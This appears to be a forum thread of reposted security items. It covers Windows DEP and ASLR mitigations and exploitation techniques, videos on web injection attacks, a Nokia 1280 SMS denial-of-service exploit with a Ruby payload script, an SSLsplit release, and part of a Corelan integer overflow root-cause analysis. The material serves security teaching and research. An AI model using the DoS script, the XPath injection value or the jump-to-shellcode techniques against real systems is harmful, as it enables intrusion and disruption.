why we’ll take a look at methods of preventing each of the conditions from being satisfied. Let’s not forget about the conditions where the buffer is very small and we can’t actually exploit the condition in one go, but we must send multiple packets to the target in order to successfully exploit it;; one such technique is the egg-hunting exploitation technique, where we first inject some malicious code into the process’s memory, which contains an identifiable group of bytes often referred to as an egg. After, that we need to inject a second (and possibly a third, fourth, etc.) input into the process, which actually exploits and overwrites the return EIP address. Thus, we can jump to the first part of the shellcode, which must find the egg in memory and continue the execution from there – this is the shellcode we’ve inputted into the process’s memory with the first packet. We must keep in mind that in all of those special cases, the above conditions must still hold, which is also the reason we’ll be examining them in more detail later in the article. 
I guess we can also mention that none of the exploitation techniques would be possible if programmers would write safe code without bugs. But because life is not perfect, bugs exist and hackers are exploiting them every day. Because of that, whitehat hackers have come up with various ways to prevent the exploitation of bugs even if they exist in the code: some of the techniques can be easily bypassed but others are very good at protecting the process’s memory. Techniques for Protecting the Finding of Input Shellcode Address When exploiting a service, we’re sending input data to the service, which stores it in a buffer. The input data usually contains bytes that represent native CPU instructions. The buffer where our input bytes are written to can be located anywhere in memory: on the stack on the heap in the static data area (initialized or uninitialized). Currently, the following methods prevent us from guessing the right input address, which we can use to overwrite some important data structure that enables us to jump to our shellcode. These methods are: Instruction set randomization: read this article. Randomizing parts of the operating system – ASLR: read this article. We need to overwrite the return address EIP or some other similar structure to jump to some instructions in memory that can help us eventually jump to our shellcode. This is why we need to overwrite the structure with something meaningful, like an address that can take us to our shellcode and execute it. There are possibly infinite possibilities of how we can do that, but let’s list just a few of them to get an idea how this can be done: call/jmp reg—We’re using the register that contains the address of our shellcode, which we’re calling to effectively execute that shellcode. We can find either the “call reg” or “jmp reg” in one of the libraries the program needs to execute in order to jump to the shellcode. Note that this only works if one of the registers contains an address that points somewhere into the shellcode. pop ret—If we cannot use the previous option because none of the registers point somewhere in our shellcode, but there’s an address that points to the shellcode written on the stack somewhere, we can use multiple pop and one ret instruction to jump to that address. push ret—If one of the registers points somewhere in our shellcode, we can also use the “push ret” instruction. This is particularly good if we cannot use the “call/jmp reg,” because we’re unable to find the appropriate jmp/call instructions in the loaded libraries. To solve that, we can push the address on the stack and then return to it by using the push reg and ret instructions. jmp [reg + offset]—We can use this instruction if there’s a register that points to our shellcode in memory, but doesn’t point to the beginning of our shellcode. We can try to find the instruction “jmp [reg+offset],” which will add the required bytes to the register and then jump to that address, presumably to the beginning of our shellcode. popad—The “popad” instruction will pop double words from the stack into the general purpose registers EDI, ESI, EBP, EBX, EDX, ECX and EAX. Also, the ESP register will be incremented by 32. By using this technique, we can make the ESP register point directly to our shellcode and then issue the jmp esp instruction to jump to it. If the shellcode is not present at the 32-byte boundary, we can add a number of nop instructions at the beginning of our shellcode to make it so. 
forward short jump (jmp num)—We can use forward short jump if we want to jump over a couple of bytes. The opcode for the jmp instruction is 0xeb, so if we would like to jump over 16 bytes, we could use the 0xeb,0×10 instructions. We could also use conditional jump instructions, where just the opcode is changed. backward short jump (jmp num)—This is the same as forward short jump, except that we would like to jump backward. We can do this by using a negative offset number, where the 8-bit needs to be 1. If we would like to jump 16 bytes back, we could use the following instructions 0xeb,0×90. SEH—Windows applications have something called a default exception handler, which is provided by the operating system. Even if the application doesn’t use exception handling, we can try to overwrite the SEH handler and then generate some exception, which will call that exception handler. Since we’ve overwritten the exception handler with the pointer to our shellcode, that will be executed when an exception occurs. Techniques for Protecting Data Structure Overwrite One of the conditions already mentioned was that if we can overwrite certain data structure, we might be able to gain control of the program and possibly the whole system. The data structures that we can overwrite are the following: EIP in Stack Frame—When a function is called, it is stored a function frame on the stack, which also contains the EIP that points to the next instruction after the function call, which is required so that the function knows where to return to. If we overwrite the EIP return address, we’ll be able to jump and execute the instruction on the arbitrary memory address. Function Pointers—We can also overwrite a function pointer that points to a function on the heap. If we overwrite the function pointer to point to our shellcode somewhere in memory, that shellcode will be executed whenever the function is called (the one whose pointer address we’ve overwritten). Keep in mind that function pointers can be allocated anywhere in memory, on stack, heap, data, etc. Longjmp Buffers—The C programming language has something called a checkpoint/rollback system called setjmp/longjmp. The basic idea is to use the setjmp (buffer) to go to checkpoint and then use the longjmp (buffer) to go back to the checkpoint. But if we manage to overflow the buffer, the longjmp (buffer) might jump back to our shellcode instead. SEH Overwrite—We can overwrite stack exception handling structures stored on the stack, which can allow us to gain code execution when an exception occurs. Program Logic—With this attack, we’re overflowing the arbitrary data structure that a program uses incorrectly: by possibly executing the inputted shellcode. This is a really rare occurrence of a bug, but is still possible. Other—There are other structures that we can overwrite to gain code execution as well. We can use the following techniques to defend the data structures (summarized from [1]): Non-Executable Stack—If the stack is non-executable, then we won’t be able to execute the code written to the stack. This protection is very effective against stack buffer overflow attacks, but doesn’t protect us from overflowing other data structures and executing the shellcode from there. DEP (Data Execution Prevention)—When DEP is enabled, we can’t execute the code from pages that are marked as data. This is an important observation, because with typical problems the code is not contained and executed from stack or heap structures, which typically contain only data. 
Array Bounds Checking—With this prevention mechanism, the buffer overflows are completely eliminated, because we can’t actually overflow an array, since the bounds are being checked automatically (without user intervention). But this approach rather slows down the program execution, since every access to an array must be checked to see if it’s within the bounds. Code Pointer Integrity Check—This protection provides a way to check whether the pointer has been corrupted before trying to execute the data from that address. DEP (Data Execution Prevention) We’ve already mentioned that DEP allows the pages in memory to be marked as non-executable, which prevents the instructions in those pages to be executed (usually the stack and heap data structure are used with DEP enabled). If the program wants to execute code from the DEP-enabled memory page, an exception is generated, which usually means the program will terminate. The default setting in a Windows system is that DEP is enabled. To check whether DEP is enabled, we must look into the C:\boot.ini configuration file and look at the /noexecute flag value. The values of the /noexecute switch can be one of the following values: OptIn—DEP enabled for system modules, but user applications can be configured to also support DEP OptOut—DEP enabled for all modules and user applications, but can be disabled for certain user applications AlwaysOn—DEP enabled for all modules and all user applications and we can’t switch it off for any user application AlwaysOff—DEP disabled for all modules and all applications and we can’t switch it on for any user application or any system module We can see that with OptIn and OptOut options, we can dynamically change whether the DEP is enabled or disabled for certain user applications. We can do that with the use of the SetProcessDEPPolicy system function. The syntax of the function is presented below (taken from [2]): The SetProcessDEPPolicy function overrides the system DEP policy for the current process unless its DEP policy was specified at process creation. The system DEP policy setting must be OptIn or OptOut. If the system DEP policy is AlwaysOff or AlwaysOn, SetProcessDEPPolicy returns an error. After DEP is enabled for a process, subsequent calls to SetProcessDEPPolicy are ignored [2]. The dwFlags parameter can be one of the following: 0—Disables the DEP for the current process if system DEP policy is either OptIn or OptOut. 1—Enables the DEP permanently for the current process. We can enable/disable DEP for certain user applications if we right-click on My Computer, then go to Advanced and click on Performance Settings – Data Execution Prevention, we see picture below: Currently the OptIn is set in the C:\boot.ini, which resembles the options specified above. If DEP was disabled, the options above would be grayed out: they are only enabled when OptIn or OptOut is being used. Let’s change the DEP configuration option to OptOut in the Performance Options window and also add an exception so that iexplore.exe won’t have DEP enabled. We see the picture below: Once we click on the Open button, the IEXPLORE.EXE will be added to the list of user applications that have DEP disabled, which can be seen in the picture below: Once we try to save the settings, a warning will pop-up notifying us that we must restart the computer in order for changes to take effect: We must click on OK and then restart the computer. 
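As an aside, this is roughly how a process on an OptIn/OptOut system would enable DEP for itself programmatically with the SetProcessDEPPolicy call discussed above (a sketch only; the call is resolved dynamically because it only exists on XP SP3 and later):

#include <stdio.h>
#include <windows.h>

#ifndef PROCESS_DEP_ENABLE
#define PROCESS_DEP_ENABLE 0x00000001   /* dwFlags value 1: enable DEP permanently */
#endif

/* BOOL WINAPI SetProcessDEPPolicy(DWORD dwFlags); */
typedef BOOL (WINAPI *SetProcessDEPPolicy_t)(DWORD);

int main(void)
{
    SetProcessDEPPolicy_t pSetDep = (SetProcessDEPPolicy_t)
        GetProcAddress(GetModuleHandleA("kernel32.dll"), "SetProcessDEPPolicy");

    /* Fails if the system policy is AlwaysOn/AlwaysOff or DEP was fixed at process creation. */
    if (pSetDep && pSetDep(PROCESS_DEP_ENABLE))
        printf("DEP permanently enabled for this process\n");
    else
        printf("SetProcessDEPPolicy failed or not available (error %lu)\n", GetLastError());
    return 0;
}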
Then we can open two processes, explorer.exe and opera.exe and observe their DEP settings in the Windbg kernel debugger. Then we need to execute the “!process 0 0? command to display the details about every process running on the system. The information about the explorer.exe and opera.exe are shown below: kd> !process 0 0 PROCESS 821dc620 SessionId: 0 Cid: 05c0 Peb: 7ffd9000 ParentCid: 05cc DirBase: 093c0180 ObjectTable: e1827200 HandleCount: 288. Image: opera.exe PROCESS 822d2948 SessionId: 0 Cid: 05c8 Peb: 7ffdf000 ParentCid: 05cc DirBase: 093c0280 ObjectTable: e1de34b8 HandleCount: 563. Image: IEXPLORE.EXE The !process command is a good way to get the pointer to the EPROCESS data structure of each process: the pointer to the opera.exe EPROCESS data structure is 0x821dc620, while the pointer to the IEXPLORE.EXE EPROCESS data structure is 0x822d2948. Let’s now show the EPROCESS data structure of each of the processes: kd> dt nt!_EPROCESS 821dc620 +0x000 Pcb : _KPROCESS +0x06c ProcessLock : _EX_PUSH_LOCK +0x070 CreateTime : _LARGE_INTEGER 0x01ce1da6`e74feeaa +0x078 ExitTime : _LARGE_INTEGER 0x0 +0x080 RundownProtect : _EX_RUNDOWN_REF +0x084 UniqueProcessId : 0x000005c0 Void kd> dt nt!_EPROCESS 822d2948 +0x000 Pcb : _KPROCESS +0x06c ProcessLock : _EX_PUSH_LOCK +0x070 CreateTime : _LARGE_INTEGER 0x01ce1da6`e7a8e488 +0x078 ExitTime : _LARGE_INTEGER 0x0 +0x080 RundownProtect : _EX_RUNDOWN_REF +0x084 UniqueProcessId : 0x000005c8 Void I didn’t present the whole output from that command, because the output is too long and we’re not interested in the rest of the output right now. We’re only interested in the first element of the EPROCESS structure, which is the KPROCESS data substructure, as we can see above. Since the first element of the EPROCESS data structure is the KPROCESS data structure, we can display that with the same memory address as we used when printing the EPROCESS data structure. We can also use the -r switch to the command to go into every substructure of the KPROCESS structure and display all of the known elements. There are a lot of members of the KPROCESS data structure, which is why we’ll only be showing the most important ones (in the output below we presented only the Flags data member): kd> dt nt!_KPROCESS 821dc620 -r +0x06b Flags : _KEXECUTE_OPTIONS +0x000 ExecuteDisable : 0y1 +0x000 ExecuteEnable : 0y0 +0x000 DisableThunkEmulation : 0y1 +0x000 Permanent : 0y1 +0x000 ExecuteDispatchEnable : 0y0 +0x000 ImageDispatchEnable : 0y0 +0x000 Spare : 0y00 +0x06b ExecuteOptions : 0xd '' kd> dt nt!_KPROCESS 822d2948 -r +0x06b Flags : _KEXECUTE_OPTIONS +0x000 ExecuteDisable : 0y0 +0x000 ExecuteEnable : 0y1 +0x000 DisableThunkEmulation : 0y0 +0x000 Permanent : 0y0 +0x000 ExecuteDispatchEnable : 0y1 +0x000 ImageDispatchEnable : 0y1 +0x000 Spare : 0y00 +0x06b ExecuteOptions : 0x32 '2' The important flags that we’re interested right now are the ExecuteDisable and ExecuteEnable. The ExecuteDisable flag is set to 1 whenever DEP is enabled, while the ExecuteEnable flag is set to 1 whenever DEP is disabled. Also the Permanent flag is set to 1 if the process cannot change the DEP policy by itself. Let’s review the settings of both processes, the IEXPLORE.EXE and opera.exe: [TABLE] [TR] [TD][/TD] [TD]ExecuteDisable[/TD] [TD]ExecuteEnable[/TD] [TD]Permanent[/TD] [/TR] [TR] [TD]Opera.exe[/TD] [TD]1[/TD] [TD]0[/TD] [TD]1[/TD] [/TR] [TR] [TD]IEXPLORE.EXE[/TD] [TD]0[/TD] [TD]1[/TD] [TD]0[/TD] [/TR] [/TABLE] We can see that the options are exactly the opposite for those two processes. 
The IEXPLORE.EXE process has DEP disabled, because the ExecuteDisable is set to 0 and ExecuteEnable is set to 1, while the opera.exe has DEP enabled, because the ExecuteDisable is set to 1 and ExecuteEnable is set to 0. The IEXPLORE.EXE has DEP disabled only because we’ve added the exception to the OptOut system DEP policy. Address Space Layout Randomization (ASLR) The Windows systems use PE headers to describe the executable files. One of the elements of the PE header is the preferred load address that is stored in the ImageBase element in the optional header. The address stored in the ImageBase is the linear address where the executable will be loaded if it can be loaded there (by default this address is 0×400000). For the next test, you have to have the Sysinternals Suite downloaded, particularly the listdlls.exe program. Let’s start the notepad.exe process and then execute the “listdlls.exe notepad.exe” program, which will list all the loaded DLLs from the notepad.exe program. The output can be seen below: We can see that the notepad.exe executable is loaded at the default virtual/linear address 0×01000000, which is not the default address 0×400000. Actually, the 0×01000000 is the default address where libraries are loaded. Let’s download the trial version of PE Explorer and open the notepad.exe executable into it. Now let’s take a look at the ImageBase element, which can be seen in the picture below: it has a value 0×01000000, which is also the preferred address of where the notepad.exe will get loaded into memory: Now we need to restart the system and use the listdlls.exe program again to list all the DLLs loaded in the notepad.exe program. The result can be seen in the picture below: Notice that the base address of the notepad.exe and every corresponding library is the same? Because of this, exploit writing has been very successful in the last couple of years. The reason is that hackers could use a hardcoded address in their exploits, which would work on various versions of Windows systems, because the virtual/linear addresses of the programs are always the same. Windows Vista presented a concept known as address space layout randomization or ASLR that loads the executables and libraries that support ASLR at arbitrary base address every time the system reboots. This makes it difficult to hardcode the addresses in the exploits, but it is still possible. The reason is the executable and all the libraries the process uses must be compiled with ASLR enabled, but this often isn’t so. The developers almost never compile the executable with ASLR enabled, and even some system libraries provided by Microsoft are not always compiled with ASLR enabled. But the attacker needs only one address to be at a constant place (even when the operating system is rebooted) in order to exploit a buffer overflow (or some other bug); thus he only needs one executable or one loaded library file to not be compiled with ASLR enabled. But because it’s still often the case that at least some library doesn’t support ASLR, ASLR protection is rather easy to bypass and thus not really effective. If we click on the Characteristics element in PE Explorer, we can see that the 0×0040 field is currently being used to specify whether the library was compiled with ASLR support, is marked as “Use of this flag is reserved for future use”. This clearly means that the ASLR is disabled and not available for the notepad.exe, as we already saw previously. 
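In later SDKs this 0x0040 bit is named IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE. A small sketch (32-bit images only, minimal error handling) that reads a PE file's optional header and reports whether the bit is set:

#include <stdio.h>
#include <windows.h>

int main(int argc, char **argv)
{
    IMAGE_DOS_HEADER dos;
    IMAGE_NT_HEADERS32 nt;
    FILE *f;

    if (argc < 2 || (f = fopen(argv[1], "rb")) == NULL)
        return 1;

    /* Read the DOS header, then follow e_lfanew to the NT headers. */
    fread(&dos, sizeof(dos), 1, f);
    fseek(f, dos.e_lfanew, SEEK_SET);
    fread(&nt, sizeof(nt), 1, f);
    fclose(f);

    if (dos.e_magic != IMAGE_DOS_SIGNATURE || nt.Signature != IMAGE_NT_SIGNATURE)
        return 1;

    /* 0x0040 = IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE: image may be relocated (ASLR-aware). */
    if (nt.OptionalHeader.DllCharacteristics & 0x0040)
        printf("%s: dynamic base (ASLR) enabled\n", argv[1]);
    else
        printf("%s: dynamic base (ASLR) NOT enabled\n", argv[1]);
    return 0;
}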
But ASLR can nevertheless be enabled system-wide by adding the MoveImages registry key to the HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\. We can do that by adding a new DWORD value, setting the key to the MoveImages and the value to 0xFFFFFFFF. This can be seen in the picture below, where the MoveImages key has been added to the registry: Upon adding the MoveImages key, we need to restart the computer. Then we can again execute the “listdlls.exe notepad.exe” program to check the base addresses of loaded libraries: Notice that the base addresses are the same even though we’ve added the MoveImages to the registry. The problem is that Windows XP doesn’t support ASLR, which is one reason among many to switch to a newer system, such as Windows Vista or Windows 7. But ASLR doesn’t affect only the base address where the libraries are loaded, but also the base address of stack, heap and other stuff that must be loaded into memory. But the DLL libraries are loaded at the same address regarding of the process using them; this is set up during the boot process of Windows. Let’s now start the Windows 7 system and check the base addresses of modules in Ollydbg when loading the notepad.exe executable. The modules and their corresponding base addresses can be seen in the picture below: After that we can restart Windows, and reopen notepad.exe in Ollydbg. Let’s list the modules again. Notice that the modules have been loaded at different base addresses? This is the effect of the ASLR being enabled. Now whenever we want to hardcode the address in shellcode, the address will be wrong after restarting the system, because the base address of the modules is at a different location; this means that the hardcoded address will not point to a different instructions in memory (if that memory is even loaded into the memory user address space). References: [1] StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks, Crispin Cowan, Calton Pu, Dave Maier, Heather Hinton, Jonathan Walpole, Peat Bakke, Steave Beattie, Aaron Grier, Perry Wagle and Qian Zhand, San Antonio, Texas, January 26-29, 1998. [2] SetProcessDEPPolicy function (Windows), accessible at SetProcessDEPPolicy function (Windows). Sursa: Windows Memory Protection Mechanisms
  10. Web Application - Csrf Explained Description: In this video you will learn about CSRF (Cross Site Request Forgery). This CSRF is a one of the most common attacks in Web Application Hacking and every web application should be aware of it. Sursa: Web Application - Csrf Explained
  11. Understanding Sql Injection, Xml Injection, And Ldap Injection Description: This is a very good short video about SQLI, XML Injection and LDAP Injection. So Messer will explain how SQL Injection will works how XML, LDAP Injection will works on Web Application and responsible for some of big industries data breaches. Sursa: Understanding Sql Injection, Xml Injection, And Ldap Injection
  12. Introduction To Sql Injection Description: In this video you will learn how to exploit web application using SQL Injection, Error Based SQL Injection, Analysis of vulnerable PHP code, Download website and database lab etc .. Sursa: Introduction To Sql Injection
  13. Writing Shellcode And Gaining Root Access http://www.youtube.com/watch?feature=player_embedded&v=uRCyIQrLV5Q Description: In this video you will learn how to write a shellcode and gain root access without any passwords. Sursa: Writing Shellcode And Gaining Root Access
  14. Blind Xpath Injection Description: In this video you will learn how to exploit Blind Xpath Injection using a tool of Blind Xpath Injection. https://www.owasp.org/index.php/Blind_XPath_Injection XPath is a type of query language that describes how to locate specific elements (including attributes, processing instructions, etc.) in an XML document. Since it is a query language, XPath is somewhat similar to Structured Query Language (SQL), however, XPath is different in that it can be used to reference almost any part of an XML document without access control restrictions. In SQL, a "user" (which is a term undefined in the XPath/XML context) may be restricted to certain databases, tables, columns, or queries. Using an XPATH Injection attack, an attacker is able to modify the XPATH query to perform an action of his choosing. Sursa: Blind Xpath Injection
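To make the OWASP description above concrete, a hypothetical sketch of the vulnerable pattern: an XPath query assembled from raw user input, where a crafted value such as ' or '1'='1 makes the predicate always true (the query and names are invented for illustration):

#include <stdio.h>

/* Hypothetical login check: user-controlled strings are pasted straight into the XPath query. */
void build_login_query(char *out, size_t out_len, const char *user, const char *pass)
{
    snprintf(out, out_len,
             "//users/user[name/text()='%s' and password/text()='%s']",
             user, pass);
}

int main(void)
{
    char query[256];

    /* Attacker-supplied password: ' or '1'='1 */
    build_login_query(query, sizeof(query), "admin", "' or '1'='1");

    /* Resulting query selects the admin node regardless of the real password:
       //users/user[name/text()='admin' and password/text()='' or '1'='1'] */
    printf("%s\n", query);
    return 0;
}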
  15. Nokia 1280 Denial Of Service

Nokia 1280 phones suffer from a denial of service vulnerability when receiving a large SMS.

###########################################################################################################
#Exploit Title: Nokia 1280 DoS Vulnerability
#Author : Un0wn_X
#E-Mail : unownsec@gmail.com
#Date : Monday, July 01, 2013
#Product: http://www.nokia.com/in-en/phones/phone/nokia-1280/
###########################################################################################################

#Vulnerability Advisory
=======================
You can send an SMS containing the malicious buffer and crash the phone once it is loaded into memory.

#Video PoC
============
http://www.youtube.com/watch?v=csLuNZ0mjpI

#Exploit
=========
#!/usr/bin/env ruby
#Author: Un0wn_X
begin
  buff = "Don't Scroll Down \n\n"
  buff += "'"*100
  file = open("exploit.txt","w")
  file.write(buff)
  file.close()
  puts "[+] Exploit created >> exploit.txt"
  puts " [*] Now send the text contained inside the exploit.txt by a sms"
  puts "[~] Un0wn_X"
end

#Final Notes
=============
I have not found a way to attach this to a debugger and fuzz the system. You may be able to exploit it further.

Sursa: Nokia 1280 Denial Of Service – Packet Storm
  16. SSLsplit 0.4.7 Site roe.ch SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing. Changes: This release prevents IETF draft public key pinning by removing HPKP headers from responses. Also, remaining threading issues in daemon mode are fixed, and the connection log now contains the HTTP status code and the size of the response. Download: http://packetstormsecurity.com/files/download/122283/sslsplit-0.4.7.tar.bz2 Sursa: SSLsplit 0.4.7 ? Packet Storm
17. [h=2]Root Cause Analysis – Integer Overflows[/h]
Published July 2, 2013 | By Corelan Team (Jason Kratzer)

Table of Contents
- Foreword
- Introduction
- Analyzing the Crash Data
- Identifying the Cause of Exception
- Page heap
- Initial analysis
- Reversing the Faulty Function
- Determining Exploitability
- Challenges
- Prerequisites
- Heap Basics
- Lookaside Lists
- Freelists
- Preventative Security Measures
- Safe-Unlinking
- Heap Cookies
- Application Specific Exploitation
- Thoughts on This Attack
- Generic Exploitation Methods
- Lookaside List Overwrite
- Overview
- Application Specific Technique
- Why Not?
- Brett Moore: Wrecking Freelist[0] Since 2005
- Freelist[0] Insert Attack
- Overview
- Application Specific Technique
- Why Not?
- Freelist[0] Searching Attack
- Overview
- Application Specific Technique
- Why Not?
- Conclusion
- Recommended Reading

[h=3]Foreword[/h]
Over the past few years, Corelan Team has received many exploit related questions, including "I have found a bug and I don't seem to control EIP, what can I do?"; "Can you write a tutorial on heap overflows?" or "What are integer overflows?". In this article, Corelan Team member Jason Kratzer (pyoor) tries to answer some of these questions in a very practical, hands-on way. He went to great lengths to illustrate the process of finding a bug, taking the crash information and reverse engineering the crash context, identifying the root cause of the bug, and finally discussing multiple ways to exploit it. Of course, most – if not all – of the techniques in this document were discovered many years ago, but I'm sure this is one of the first (public) articles that shows you how to use them in a real life scenario, with a real application. Although the techniques mostly apply to Windows XP, we believe it is required knowledge, necessary before looking at newer versions of the Windows operating system and defeating modern mitigation techniques. enjoy ! - corelanc0d3r

[h=3]Introduction[/h]
In my previous article, we discussed the process used to evaluate a memory corruption bug that I had identified in a recently patched version of KMPlayer. With the crash information generated by this bug we were able to step through the crash, identify the root cause of our exception, and determine exploitability. In doing so, we were able to identify 3 individual methods that could potentially be used for exploitation. This article will serve as a continuation of the series with the intention of building upon some of the skills we discussed during the previous "Root Cause Analysis" article. I highly recommend that, if you have not done so already, you review the contents of that article (located here) before proceeding. For the purpose of this article, we'll be analyzing an integer overflow that I had identified in the GOM Media Player software developed by GOM Labs. This bug affects GOM Media Player 2.1.43 and was reported to the GOM Labs development team on November 19, 2012. A patch was released to mitigate this issue on December 12, 2012. As with our previous bug, I had identified this vulnerability by fuzzing the MP4/QT file formats using the Peach Framework (v2.3.9). In order to reproduce this issue, I have provided a bare bones fuzzing template (Peach PIT) which specifically targets the vulnerable portion of the MP4/QT file format. You can find a copy of that Peach PIT here. The vulnerable version of GOM player can be found here. 
[h=3]Analyzing the Crash Data[/h] Let’s begin by taking a look at the file, LocalAgent_StackTrace.txt, which was generated by Peach at crash time. I’ve included the relevant portions below: (cdc.5f8): Access violation - code c0000005 (first chance) r eax=00000028 ebx=0000004c ecx=0655bf60 edx=00004f44 esi=06557fb4 edi=06555fb8 eip=063b4989 esp=0012bdb4 ebp=06557f00 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 GSFU!DllUnregisterServer+0x236a9: 063b4989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:0655c000=???????? kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 0012bdc0 063b65eb 064dcda8 06555fb8 0652afb8 GSFU!DllUnregisterServer+0x236a9 0012bdd8 063b8605 064dcda8 06555fb8 0652afb8 GSFU!DllUnregisterServer+0x2530b 0012be00 063b8a85 064dcda8 0652afb8 0652afb8 GSFU!DllUnregisterServer+0x27325 0012be18 063b65eb 064dcda8 0652afb8 06510fb8 GSFU!DllUnregisterServer+0x277a5 0012be30 063b8605 064dcda8 0652afb8 06510fb8 GSFU!DllUnregisterServer+0x2530b 0012be58 063b8a85 064dcda8 06510fb8 06510fb8 GSFU!DllUnregisterServer+0x27325 0012be70 063b65eb 064dcda8 06510fb8 06500fb8 GSFU!DllUnregisterServer+0x277a5 <...truncated...> INSTRUCTION_ADDRESS:0x00000000063b4989 INVOKING_STACK_FRAME:0 DESCRIPTION:User Mode Write AV SHORT_DESCRIPTION:WriteAV CLASSIFICATION:EXPLOITABLE BUG_TITLE:Exploitable - User Mode Write AV starting at GSFU!DllUnregisterServer+0x00000000000236a9 (Hash=0x1f1d1443.0x00000000) EXPLANATION:User mode write access violations that are not near NULL are exploitable. (You can download the complete Peach crash data here) As we can see here, we’ve triggered a write access violation by attempting to write the value of edx to the location pointed at by [ecx+eax*4]. This instruction fails of course because the location [ecx+eax*4] points to an inaccessible region of memory. (0655c000=????????) Since we do not have symbols for this application, the stack trace does not provide us with any immediately evident clues as to the cause of our exception. Furthermore, we can also see that !exploitable has made the assumption that this crash is exploitable due to the fact that the faulting instruction attempts to write data to an out of bounds location and that location is not near null. It makes this distinction because a location that is near null may be indicative of a null pointer dereference and these types of bugs are typically not exploitable (though not always). Let’s try and determine if !exploitable is in fact, correct in this assumption. [h=3]Identifying the Cause of Exception[/h] [h=4]Page heap[/h] Before we begin, there’s something very important that we must discuss. Take a look at the bare bones Peach PIT I’ve provided; particularly the Agent configuration beginning at line 55. <Agent name="LocalAgent"> <Monitor class="debugger.WindowsDebugEngine"> <Param name="CommandLine" value="C:\Program Files\GRETECH\GomPlayer\GOM.EXE "C:\fuzzed.mov"" /> <Param name="StartOnCall" value="GOM.EXE" /> </Monitor> <Monitor class="process.PageHeap"> <Param name="Executable" value="GOM.EXE"/> </Monitor> </Agent> Using this configuration, I’ve defined the primary monitor as the “WindowsDebugEngine” which uses PyDbgEng, a wrapper for the WinDbg engine dbgeng.dll, in order to monitor the process. This is typical of most Peach fuzzer configurations under windows. However, what’s important to note here is the second monitor, “process.PageHeap”. 
This monitor enables full page heap verification by using the Microsoft Debugging tool, GFlags (Global Flags Editor). In short, GFlags is a utility that is packaged with the Windows SDK, and enables users to more easily troubleshoot potential memory corruption issues. There are a number of configuration options available with GFlags. For the purpose of this article, we’ll only be discussing 2: standard and full page heap verification. When using page heap verification, a special page header prefixes each heap chunk. The image below displays the structure of a standard (allocated) heap chunk and the structure of an (allocated) heap chunk with page heap enabled. This information can also be extracted by using the following display types variables: # Displays the standard heap metadata. Replace 0xADDRESS with the heap chunk start address dt _HEAP_ENTRY 0xADDRESS # Displays the page heap metadata. Replace 0xADDRESS with the start stamp address. dt _DPH_BLOCK_INFORMATION 0xADDRESS One of the most important additions to the page heap header is the "user stack traces" (+ust) field. This field contains a pointer to the stack trace of our allocated chunk. This means that we’re now able to enumerate which functions eventually lead to the allocation or free of a heap chunk in question. This is incredibly useful when trying to track down the root cause of our exception. Both standard and full heap verification prefix each chunk with this header. The primary difference between standard and full page heap verification is that under standard heap verification, fill patterns are placed at the end of each heap chunk (0xa0a0a0a0). If for instance a buffer overflow were to occur and data was written beyond the boundary of the heap chunk, the fill pattern located at the end of the chunk would be overwritten and therefore, corrupted. When our now corrupt block is accessed by the heap manager, the heap manager will detect that the fill pattern has been modified/corrupted and cause an access violation to occur. With full page heap verification enabled, rather than appending a fill pattern, each heap chunk is placed at the end of a (small) page. This page is followed by another (small) page that has the PAGE_NOACCESS access level set. Therefore, as soon as we attempt to write past the end of the heap chunk, an access violation will be triggered directly (in comparison with having to wait for a call to the heap manager). Of course, the use of full page heap will drastically change the heap layout, because a heap allocation will trigger the creation of a new page. In fact, the application may even run out of heap memory space if your application is performing a lot of allocations. For a full explanation of GFlags, please take a look at the MSDN documentation here. Now the reason I’ve brought this up, is that in order to replicate the exact crash generated by Peach, we’ll need to enable GFlags for the GOM.exe process. GFlags is part of the Windows Debugging Tools package which is now included in the Windows SDK. The Windows 7 SDK, which is recommended for both Windows XP and 7 can be found here. In order to enable full page heap verification for the GOM.exe process, we’ll need to execute the following command. C:\Program Files\Debugging Tools for Windows (x86)>gflags /p /enable GOM.exe /full [h=4]Initial analysis[/h] With that said, let’s begin by comparing our original seed file and mutated file using the 010 Binary Editor. 
Please note that in the screenshot below, "Address A" and "Address B" correlate with OriginalSeed.mov and MutatedSeed.mov respectively. Here we can see that our fuzzer applied 8 different mutations and removed 1 block element entirely (as identified by our change located at offset 0x12BE). As documented in the previous article, you should begin by reverting each change, 1 element at a time, from their mutated values to those found in the original seed file. After each change, save the updated sample and open it up in GOM Media Player while monitoring the application using WinDbg.

windbg.exe "C:\Program Files\GRETECH\GomPlayer\GOM.EXE" "C:\Path-To\MutatedSeed.mov"

The purpose here is to identify the minimum number of mutated bytes required to trigger our exception. Rather than documenting each step of the process, which we had already outlined in the previous article, we'll simply jump forward to the end result. Your minimized sample file should now look like the following: Here we can see that a single, 4 byte change located at file offset 0x131F was responsible for triggering our crash. In order to identify the purpose of these bytes, we must identify what atom or container they belong to. Just prior to our mutated bytes, we can see the ASCII string "stsz". This is known as a FourCC. The QuickTime and MPEG-4 file formats rely on these FourCC strings in order to identify the various atoms or containers used within the file format. Knowing that, we can look up the structure of the "stsz" atom in the QuickTime File Format Specification found here.

Size: 0x00000100
Type: 0x7374737A (ASCII stsz)
Version: 0x00
Flags: 0x000000
Sample Size: 0x00000000
Number of Entries: 0x80000027
Sample Size Table(1): 0x000094B5
Sample Size Table(2): 0x000052D4

Looking at the layout of the "stsz" atom, we can see that the value for the "Number of Entries" element has been replaced with a significantly larger value (0x80000027 compared with the original value of 0x3B). Now that we've identified the minimum change required to trigger our exception, let's take a look at the faulting block (GSFU!DllUnregisterServer+0x236a9) in IDA Pro.

[h=3]Reversing the Faulty Function[/h]

Without any state information, such as register values or memory locations used during run time, we can only make minor assumptions based on the instructions contained within this block. However, armed with only this information, let's see what we can come up with. Let's assume that eax and edx are set to 0x00000000 and that esi points to memory containing the bytes AA BB CC DD.

A single byte is moved from the location pointed at by esi to edx, resulting in edx == 0x000000AA
A single byte is moved from the location pointed at by [esi+1] to ecx
